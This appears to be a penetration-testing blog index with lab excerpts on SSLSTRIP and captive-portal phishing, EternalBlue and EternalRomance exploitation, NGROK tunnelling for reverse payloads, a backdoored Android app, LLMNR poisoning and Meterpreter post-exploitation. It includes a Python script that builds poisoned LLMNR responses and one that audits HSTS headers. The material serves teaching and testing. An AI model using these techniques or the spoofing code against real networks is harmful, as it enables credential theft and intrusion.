Posts

Showing posts from 2018

Using MITMF with SSLSTRIP and Captive Portal options

In this video we will try out a variation of the man-in-the-middle with SSLSTRIP attack that we performed previously. In MITMF, in addition to ARP spoofing and SSLSTRIP, we will also be using the Captive Portal option. Please review the videos listed below, if needed:
- Bettercap with SSLSTRIP attack - Does it still work ?
- SSLSTRIP attacks with Bettercap and MITMF - HSTS and Web browsers
We saw in the previous videos that websites correctly configured for HSTS can't be attacked using SSLSTRIP. On the other hand, at this moment a lot of websites still don't use HSTS, or have HSTS incorrectly configured, which leaves those websites vulnerable to man-in-the-middle and SSLSTRIP attacks. Because it is unlikely for a user to browse ONLY correctly configured HSTS websites, an attacker can redirect the SSLSTRIP-vulnerable websites to a Captive Portal and trick the user into giving up credentials belonging to websites that can't be attacked directly (for example: social media

SSLSTRIP attacks - New Bettercap 2.x vs Old Bettercap 1.x

During my previous two SSLSTRIP videos, I preferred to use the "old" Bettercap version 1.6.2 instead of the "new" Bettercap version 2.x. Bettercap version 1.6.2 is the version currently available in the Kali Linux repository. Bettercap version 2.x can be installed from the following GitHub link: https://github.com/bettercap/bettercap
In this video I will use the latest Bettercap version 2.11 to perform SSLSTRIP MITM attacks against sample HTTPS websites. These are the same websites that we tested during the previous SSLSTRIP videos:
- Bettercap with SSLSTRIP attack - Does it still work ?
- SSLSTRIP attacks with Bettercap and MITMF - more info about HSTS and Web browsers
Bettercap 2.x is an awesome tool, but unfortunately it seems to have a few shortcomings when it comes to SSLSTRIP. These SSLSTRIP-related issues were previously raised in the following GitHub issue: https://github.com/bettercap/bettercap/issues/154
During this video we will experien

SSLSTRIP attacks with Bettercap and MITMF - more info about HSTS and Web browsers

I've decided to make a follow-up video on SSLSTRIP and man-in-the-middle attacks, in order to clarify and emphasize a few things around HSTS and Web browsers. The client Web browser version is sometimes overlooked when HSTS is discussed, even though HSTS is enforced entirely by the browser: a policy the browser does not understand, or has not yet seen, protects nothing. In this video we use Bettercap and different client Web browsers to simulate man-in-the-middle attacks against websites that are correctly configured for HSTS. We will see that the attacks succeed or fail depending on the Web browser version and capabilities. See below a list of browsers with HSTS support (Reference: Wikipedia - HTTP_Strict_Transport_Security):
- Chromium and Google Chrome since version 4.0.211.0
- Firefox since version 4; with Firefox 17, Mozilla integrated a list of websites supporting HSTS (the preload list).
- Opera since version 12
- Safari as of OS X Mavericks
- Internet Explorer 11 on Windows 8.1 and Windows 7 when KB 3058515 is installed
- Microsoft Edge and Internet Explorer 11 on Wind

MS17-010 Vulnerability - New EternalBlue SMB module for Metasploit - Exploiting Windows 8.1

In its July 2018 update, Metasploit released a new EternalBlue module named ms17_010_eternalblue_win8. The short description for this module reads: MS17-010 EternalBlue SMB remote Windows Kernel Pool Corruption for Win8+. The July Metasploit update releases can be found on this link. Of course, Metasploit already had an EternalBlue module, called ms17_010_eternalblue, but this older module was compatible only with Windows 7 and Windows 2008 R2 (x64). On the other hand, the new ms17_010_eternalblue_win8 is listed as being compatible with Windows 8.1, Windows 10 (selected builds) and Windows 2012 R2 (x64). Before watching my new video on exploiting Windows 8.1 with the new ms17_010_eternalblue_win8 module, you might find it useful to review my previous posts related to the EternalBlue exploit, which I list below:
1. MS17-010 Vulnerability - Using EternalBlue exploit module in Metasploit
2. MS17-010 Vulnerability - EternalBlue exploit using a binary payload an

Bettercap with SSLSTRIP attack - Does it still work ?

For a long time, performing a MITM attack with SSLSTRIP was relatively easy. This changed once websites started to use HSTS (HTTP Strict Transport Security). SSLSTRIP alone is powerless against HTTPS websites that correctly implement HSTS, at least once the browser knows the site's policy. On the other hand, many websites on the Internet DO NOT configure HSTS correctly, and this misconfiguration still leaves them vulnerable to MITM attacks using SSLSTRIP under particular conditions. In this video we will test Bettercap and SSLSTRIP against different categories of websites. All the tested websites use HTTPS, but they differ in the way they implement HSTS:
- The first category of websites have HSTS correctly implemented, and the HSTS status for each website is also preloaded into the Internet browser. (The website's HSTS status is known by the web browser before the first access.) The test sites in the first category are: facebook.com, gmail.com and twitter.com
- The second category of websites hav
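The three SSLSTRIP posts above all come down to one question: on a plaintext first request, does the browser already know it must go HTTPS? The following script is an added example, not code from this blog or from Bettercap, that parses a Strict-Transport-Security header and sorts a site into the categories the video tests (preloaded, correct but not preloaded, host-only, disabled, missing, or sent over plain HTTP and therefore ignored). The host names, header values and preload flags in SAMPLE_SITES are constructed for the example; run it against real headers by feeding the value of the response header you observe.

```python
"""Classify a site's HSTS posture as a browser would treat it on a plaintext
first request, which is exactly the window SSLSTRIP attacks.
Added example; the hosts and header values below are constructed."""

PRELOAD_MIN_MAX_AGE = 31536000  # one year, the minimum hstspreload.org accepts


def parse_hsts(header_value):
    """Parse a Strict-Transport-Security value into a directive dict.
    Returns None when the header is absent; valueless directives map to True."""
    if header_value is None:
        return None
    directives = {}
    for token in header_value.split(";"):
        token = token.strip()
        if not token:
            continue
        name, _, value = token.partition("=")
        directives[name.strip().lower()] = value.strip().strip('"') if value else True
    return directives


def classify(host, header_value, preloaded=False, received_over_https=True):
    """Return (category, when SSLSTRIP can still rewrite traffic) for one host.

    preloaded: host is in the browser's built-in preload list.
    received_over_https: RFC 6797 browsers ignore HSTS received over plain HTTP.
    """
    if preloaded:
        return ("preloaded", "never: the browser upgrades even the first request")
    d = parse_hsts(header_value)
    if d is None:
        return ("no-hsts", "every visit: plaintext requests can be rewritten")
    if not received_over_https:
        return ("ignored", "every visit: header sent over HTTP is discarded")
    try:
        max_age = int(d.get("max-age", 0))
    except (TypeError, ValueError):
        max_age = 0
    if max_age <= 0:
        return ("disabled", "every visit: invalid or zero max-age stores no policy")
    if "includesubdomains" not in d:
        return ("host-only", "first visit, after expiry, and on every subdomain")
    if "preload" in d and max_age >= PRELOAD_MIN_MAX_AGE:
        return ("preload-ready", "first visit only, until the entry ships in browser preload lists")
    return ("correct-not-preloaded", "first visit and after max-age expiry (trust on first use)")


# Constructed sample: host -> (header value or None, preloaded?, received over HTTPS?)
SAMPLE_SITES = {
    "preloaded.example": ("max-age=31536000; includeSubDomains; preload", True, True),
    "hardened.example": ("max-age=31536000; includeSubDomains; preload", False, True),
    "partial.example": ("max-age=86400", False, True),
    "broken.example": ("max-age=0", False, True),
    "http-only.example": ("max-age=31536000; includeSubDomains", False, False),
    "legacy.example": (None, False, True),
}


def audit(sites):
    """Map each host to its HSTS category."""
    return {host: classify(host, hdr, pre, https)[0]
            for host, (hdr, pre, https) in sites.items()}


if __name__ == "__main__":
    for host, (hdr, pre, https) in SAMPLE_SITES.items():
        category, window = classify(host, hdr, pre, https)
        print(f"{host:22} {category:22} sslstrip window: {window}")
```

Only the preloaded category removes the first-visit window entirely, which is why the video's first group (facebook.com, gmail.com, twitter.com) resists SSLSTRIP even in a fresh browser profile; every other category leaves at least one request in the clear for the proxy to rewrite.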

Over the WAN simulation - hacking into an Android phone with NGROK and Metasploit

This video is another "over the WAN" hacking simulation. This time we will use Kali Linux together with NGROK, Metasploit and the reverse_http payload to hack into an Android phone. The test LG G2 Android phone will be connected to the Internet via 4G. This video uses information that was presented in my previous posts. Please review the posts below, as needed:
1. Over the WAN Penetration Testing LAB - Installing and using NGROK and NETCAT
2. MS17-010 Vulnerability - Over the WAN LAB with NGROK - EternalBlue and EternalRomance exploits on Windows 10, Windows 7 and Windows 2018 R2
3. Metasploit Tips - reverse_https vs reverse_tcp payloads (also covers the "multihandler" exploit)
4. Generating shellcode - using msfvenom to generate a binary payload
Android application
The Android application used in this video was downloaded from: https://apkpure.com/roll-balls-into-a-hole/com.andregal.android.billard
This application was randomly chosen. Any other ap

MS17-010 Vulnerability - Over the WAN LAB with NGROK - EternalBlue and EternalRomance exploits on Windows 10, Windows 7 and Windows 2018 R2

In this video we will use the "Over the WAN" LAB that was configured in the previous post in order to exploit the MS17-010 vulnerability. We will use the EternalBlue and EternalRomance / EternalChampion exploit modules in Metasploit, together with NGROK. This video heavily uses information that was presented in my previous posts. Please review the posts below, as needed:
1. Over the WAN Penetration Testing LAB - Installing and using NGROK and NETCAT
2. MS17-010 Vulnerability - Scanning using Metasploit on KALI Linux
3. MS17-010 Vulnerability - Using EternalBlue exploit module in Metasploit
4. Metasploit Tips - reverse_https vs reverse_tcp payloads (also covers the "multihandler" exploit)
5. MS17-010 Vulnerability - New EternalRomance / EternalSynergy / EternalChampion SMB modules for Metasploit - Exploiting Windows10 and Windows2008R2
STDAPI
In order to be able to use the "sysinfo", "getuid" and "ipconfig" co

Over the WAN Penetration Testing LAB - Installing and using NGROK and NETCAT

In this video we will discuss some common challenges faced during external penetration testing exercises. We will then configure the LAB to simulate an "over the WAN" environment. We will install and configure NGROK, then we will see how port forwarding via the NGROK service can help in an "over the WAN" scenario. As we progress with the new LAB configuration, we will perform connectivity testing using NETCAT.
NGROK
NGROK is a multiplatform tunnelling / reverse proxy tool that establishes secure tunnels from a public endpoint on the Internet to a network service running on the local machine. Check the following link for more details about NGROK: https://ngrok.com/product
Sign up for a free NGROK account using the following link: https://dashboard.ngrok.com/user/signup
In order to establish a TCP tunnel exposing port 80 on the local Kali Linux machine, we will use the following command:
./ngrok tcp 80
NETCAT
NETCAT is a computer networking utility used

LLMNR and NBT-NS poisoning attack using Responder and MultiRelay

In the previous post we discussed the basis for an LLMNR and NBT-NS attack and we showed this attack using four Metasploit modules. In this new video we will continue to demonstrate the LLMNR and NBT-NS attack, but instead of Metasploit we will be using Laurent Gaffie's Responder script.
Responder
Responder is a Python script that listens for Link-Local Multicast Name Resolution (LLMNR), NetBIOS Name Service (NBT-NS) and Multicast Domain Name System (mDNS) broadcast messages. Responder is also an LLMNR, NBT-NS and mDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication servers supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. More information about Responder and its related utilities can be found on Laurent Gaffie's Blog. The script can be downloaded from GitHub at: https://github.com/lgandx/Responder
The following options are available when running Responder:
The following command was used to laun

LLMNR and NBT-NS poisoning attack using Metasploit

In this video we will simulate an LLMNR and NBT-NS poisoning attack, collect the users' Net-NTLM challenge/response hashes and then crack them offline. This type of attack is very common during internal penetration testing assessments for the following reasons:
- it works well with any Windows OS version
- it performs well in both wired and wireless internal networks
- it has a good chance to succeed because LLMNR and NBT-NS (NetBIOS Name Service) queries are enabled by default on Windows hosts; their usage does not require any authentication and any system in the local network can respond to these queries
- the risk of crashing network hosts or disrupting the network users' activity is low
The basis for this attack is the way a Windows host performs name resolution; usually the steps below are performed in order, until the name is resolved:
1. The hosts file on the local host is checked
2. The local DNS cache is checked
3. A name query is sent to the DNS server
4. An LLMNR query is sent via multicast
5.
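The two LLMNR posts above describe the exchange that Responder and the Metasploit modules exploit; the following is an added example, not code from this blog, from Responder or from Metasploit, that builds both sides of it offline: the query a Windows host multicasts to 224.0.0.252:5355 when DNS fails, and the response a poisoner returns for any name with its own address. The wire format follows RFC 4795 (a DNS-style header, question and answer record); the transaction ID, the name "fileserver" and the IP 192.168.254.142 in the demo are constructed. The last function shows the only checks the victim's resolver performs on a response, which is the whole reason poisoning works.

```python
"""LLMNR query/response on the wire (RFC 4795), built and parsed offline.
Added example; transaction ID, hostname and IP addresses are constructed."""
import socket
import struct

LLMNR_GROUP = ("224.0.0.252", 5355)  # IPv4 multicast group and UDP port used by LLMNR
QTYPE_A, QCLASS_IN = 1, 1
FLAG_QR = 0x8000  # set in responses


def encode_name(name):
    """DNS-style label encoding: length-prefixed labels, terminated by a zero byte."""
    out = b""
    for label in name.strip(".").split("."):
        raw = label.encode("ascii")
        out += struct.pack("!B", len(raw)) + raw
    return out + b"\x00"


def decode_name(data, offset):
    """Decode a (possibly compressed) name at offset; return (name, next_offset)."""
    labels = []
    while True:
        length = data[offset]
        if length == 0:
            return ".".join(labels), offset + 1
        if length & 0xC0 == 0xC0:  # compression pointer into the packet
            pointer = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            pointed, _ = decode_name(data, pointer)
            labels.append(pointed)
            return ".".join(labels), offset + 2
        labels.append(data[offset + 1:offset + 1 + length].decode("ascii"))
        offset += 1 + length


def build_query(tid, name):
    """The packet a Windows host multicasts when hosts file, cache and DNS all fail."""
    header = struct.pack("!HHHHHH", tid, 0, 1, 0, 0, 0)  # ID, flags, QD, AN, NS, AR
    return header + encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)


def build_poisoned_response(query, answer_ip, ttl=30):
    """What a poisoner sends back: copy the victim's ID and question and answer
    with the attacker's IP, no matter which name was asked for."""
    tid = struct.unpack("!H", query[:2])[0]
    _, off = decode_name(query, 12)
    question = query[12:off + 4]
    header = struct.pack("!HHHHHH", tid, FLAG_QR, 1, 1, 0, 0)
    # answer name is a pointer (0xC00C) back to the question name at offset 12
    rr = struct.pack("!HHHIH", 0xC00C, QTYPE_A, QCLASS_IN, ttl, 4) + socket.inet_aton(answer_ip)
    return header + question + rr


def parse_response(data):
    """Parse an LLMNR response; return None if the packet is not a response."""
    tid, flags, _qd, ancount, _ns, _ar = struct.unpack("!HHHHHH", data[:12])
    if not flags & FLAG_QR:
        return None
    name, off = decode_name(data, 12)
    off += 4  # skip QTYPE/QCLASS
    answers = []
    for _ in range(ancount):
        _, off = decode_name(data, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", data[off:off + 10])
        off += 10
        rdata, off = data[off:off + rdlen], off + rdlen
        if rtype == QTYPE_A and rdlen == 4:
            answers.append(socket.inet_ntoa(rdata))
    return {"tid": tid, "name": name, "answers": answers}


def response_matches(query, response):
    """The victim's resolver only checks that ID and question name match the query.
    Nothing ties the answer to a legitimate host, so the first responder wins."""
    parsed = parse_response(response)
    if parsed is None:
        return False
    qtid = struct.unpack("!H", query[:2])[0]
    qname, _ = decode_name(query, 12)
    return parsed["tid"] == qtid and parsed["name"].lower() == qname.lower()


if __name__ == "__main__":
    q = build_query(0x1234, "fileserver")              # constructed: victim mistypes a share host
    r = build_poisoned_response(q, "192.168.254.142")  # constructed: attacker's Kali box answers
    print(parse_response(r), response_matches(q, r))
    # To send for real: socket.socket(socket.AF_INET, socket.SOCK_DGRAM).sendto(q, LLMNR_GROUP)
```

Once the victim accepts the poisoned answer it connects to the attacker's IP for the SMB or HTTP resource it wanted, and the rogue server in Responder or Metasploit then collects the Net-NTLM authentication that follows.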

Metasploit Tips - reverse_https vs reverse_tcp payloads

In this video we will exploit an MS17-010 vulnerable computer, but instead of using the classic "reverse_tcp" payload we will use the "reverse_https" payload. There are two main features which make the reverse_http and reverse_https payloads very useful:
1. These payloads use HTTP/HTTPS traffic, and protocol-inspecting firewalls usually allow HTTP/HTTPS traffic while they might block other types of traffic. In addition, these payloads use the WinInet API and will leverage any proxy or authentication settings that the user has configured for Internet access.
2. These payloads deal well with cases where the compromised target has spotty Internet access. If the connection between the "victim" and the "attacker" machine drops, the payload will keep trying to reconnect to the "attacker" computer.
In the video we will exploit the target computer, then we will drop the Meterpreter session by interrupting network co

MS17-010 Vulnerability - New EternalRomance / EternalSynergy / EternalChampion SMB modules for Metasploit - Exploit Windows2012R2 and Windows2016

In the previous post, we covered the two new MS17-010 EternalRomance / EternalSynergy / EternalChampion SMB Remote Windows Command/Code Execution modules that Metasploit released last month: auxiliary/admin/smb/ms17_010_command and exploit/windows/smb/ms17_010_psexec. One of the cool features of the new modules is that they are supposed to work with all Microsoft OS versions post-Windows 2000. Check this message on Twitter from zerosum0x0, one of the modules' authors. Therefore, I wanted to test the new modules with newer Microsoft Server OS versions like Windows 2012 R2 and Windows 2016. As you will see in the video below, exploiting Windows 2012 R2 and Windows 2016 is similar to exploiting Windows 10. We will need (non-admin) user credentials in order to exploit successfully, because by default no named pipes are available when connecting anonymously. For learning purposes, I attempted to use the modules without specifying the credentials and I got the following error:

MS17-010 Vulnerability - New EternalRomance / EternalSynergy / EternalChampion SMB modules for Metasploit - Exploiting Windows10 and Windows2008R2

Until early last month, Metasploit had only two modules related to the MS17-010 SMB vulnerability. The first module, auxiliary/scanner/smb/smb_ms17_010, is a scanner for detecting the MS17-010 vulnerability. We covered this module in a previous post. The second module, exploit/windows/smb/ms17_010_eternalblue, is the MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption exploit. We also covered this exploit previously in a post here. The EternalBlue exploit was designed to work with Windows 7 and Windows Server 2008 R2 target computers, which is quite restrictive from an OS point of view. We also discussed previously the MS17-010 DoublePulsar exploit, which can be used with more OSes, but this module doesn't come by default with Metasploit and has to be downloaded and installed separately. Fortunately, last month Metasploit released two long-awaited new modules in relation to the MS17-010 vulnerability: auxiliary/admin/smb/ms17_010_command and explo

Quick Meterpreter and Metasploit tutorial - Stealing hashes and passwords, Keyloggers, Webcams and other post-exploitation modules

I thought that it would be useful for some readers if we review some of the most commonly used post-exploitation commands in Meterpreter and Metasploit. This is the second video, and we will discuss stealing hashes and passwords, using keyloggers, accessing webcams and invoking other post-exploitation modules. The first part of this tutorial can be found here: Quick Meterpreter and Metasploit tutorial - Core, System, Networking and File System usual commands
LAB details - VM names and IP addresses
Kali6 (Kali Linux, attacker VM): 192.168.254.142
W7x64-1 (Windows 7, target VM): 192.168.254.70
W2008R21 (Windows 2008R2, Domain Controller): 192.168.254.99
Domain name: TESTLAB3
Domain user credentials:
Administrator / P@ssw0rd
testuser1 / P@ssword1
testuser2 / P@ssword1
Local Administrator on W7x64-1 credentials: WinLocalAdmin / P@ssw0rd
Exploitation process
The Windows 7 test machine is affected by the MS17-010 vulnerability. For exploitation, we will foll